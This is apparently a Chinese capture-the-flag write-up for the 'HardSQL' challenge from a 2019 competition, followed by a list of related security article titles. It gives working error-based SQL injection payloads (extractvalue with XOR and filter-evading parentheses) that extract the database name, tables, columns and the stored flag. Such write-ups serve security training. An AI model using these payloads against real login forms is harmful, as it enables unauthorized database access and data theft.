[极客大挑战 2019]HardSQL1

拿到题目,好多类似的,这次估计更难,sql注入漏洞

随便注入一个

估计是被过滤了

2.1我们先去爆数据库:先构造payload:

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(database()))))%23

爆表名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

爆列名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

flag出来了,但是只有一半,使用right和left

复制代码
/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

得到flag

相关推荐
hjh198291 小时前
复现cacti的RCE
网络·安全·php
Sh3r10ck2 小时前
【Hack The Box】Code Write Up
安全
wha the fuck4043 小时前
攻防世界-引导-Web_php_unserialize
安全·web安全·网络安全·php
小田冲冲冲3 小时前
命令执行漏洞
安全
德迅云安全杨德俊6 小时前
应用加速游戏盾的安全作用
网络·安全·游戏·ddos
跨境卫士情报站7 小时前
亚马逊地址关联暴雷:新算法下的账号安全保卫战
安全·亚马逊跨境电商
Guheyunyi7 小时前
安全风险监测系统是什么?内容有哪些?
大数据·人工智能·深度学习·安全·信息可视化
全知科技7 小时前
API产品升级丨全知科技发布「知影-API风险监测平台」:以AI重构企业数据接口安全治理新范式
大数据·人工智能·科技·安全
Goboy9 小时前
弹窗大战15年祭,零信任iOA的枪口,正对准哪吒的方向盘
安全·程序员·产品
Teamhelper_AR9 小时前
AR眼镜:工业4.0时代高风险作业的安全守护者
安全·ar